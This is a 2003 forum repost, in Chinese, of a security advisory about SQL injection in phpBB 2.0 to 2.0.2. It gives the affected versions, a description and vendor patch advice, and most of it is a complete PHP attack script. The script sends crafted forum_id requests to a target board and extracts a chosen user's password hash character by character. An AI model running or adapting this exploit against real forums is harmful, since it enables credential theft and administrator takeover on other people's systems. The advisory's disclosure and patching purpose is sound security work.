[轉貼]PHPBB2過程SQL注入漏洞
發表於 : 2003-02-28 11:04
在大陸破解論壇看到ㄉ=..=
http://bbs.netxeyes.org/cgi-bin/bbs3000 ... 22&id=tech
http://bbs.netxeyes.org/cgi-bin/bbs3000 ... 22&id=tech
代碼: 選擇全部
发布日期:2003-02-19
更新日期:2003-02-27
受影响系统:
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
不受影响系统:
phpBB Group phpBB 2.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 6888
phpBB是一款流行的开放源代码BBS系统。
phpBB2部分脚本没有充分过滤用户提供的输入,远程攻击者可以利用这个漏洞对数据库进行未授权操作,获得系统敏感信息。
由于phpBB2部分脚本对用户输入缺少充分检查,攻击者可以提交恶意SQL命令修改原来phpBB2系统的SQL逻辑,造成攻击者未授权修改数据库,可能以phpBB2管理员身份进入应用系统。
<*来源:David Zentner (david@cgishield.com)
链接:http://www.cgishield.com/?target=advisory&id=8
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
David Zentner (david@cgishield.com)提供了如下测试方法:
<?php
########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David@cgishield.com
// To use this program, simply upload it to a php enabled webserver, and execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";
// don't change this
$data_to_match="In total there are <b>0</b> users online";
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=1;$i<33;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$checkchar[$i2]/*";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("$data_to_match","$data")){
//echo("<b>$i2</b>");
}
else{echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1
");
fputs($fp, "Host: $host
");
fputs($fp, "Content-type: application/x-www-form-urlencoded
");
fputs($fp, "Content-length: " . strlen($data) . "
");
if ($useragent)
fputs($fp, "User-Agent: Mozilla
");
fputs($fp, "Connection: close
");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpBB Group
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到phpBB 2.0.3及之后的版本:
http://www.phpbb.com/downloads.php
http://www.phpbb.com/